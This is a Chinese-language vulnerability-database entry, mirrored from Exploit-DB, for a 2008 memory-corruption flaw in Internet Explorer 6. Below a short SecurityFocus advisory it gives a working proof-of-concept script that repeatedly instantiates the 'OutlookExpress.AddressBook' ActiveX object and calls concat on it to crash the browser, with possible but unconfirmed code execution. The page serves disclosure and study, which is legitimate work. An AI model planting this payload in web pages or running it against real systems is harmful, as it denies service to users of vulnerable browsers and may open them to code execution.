Microsoft Internet Explorer 6 - New ActiveX Object String Concatenation Memory Corruption

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056742 漏洞类型
发布时间 2008-07-14 更新时间 2008-07-14
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/32049
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/30219/info

Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability.

Remote attackers can exploit this issue to crash the affected application, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.

<script>

for(i=0;i<33;i++){

   try{ 

   foo = new ActiveXObject("OutlookExpress.AddressBook").concat('3'+'3'+'3'); 

   }catch(e){}

}

</script>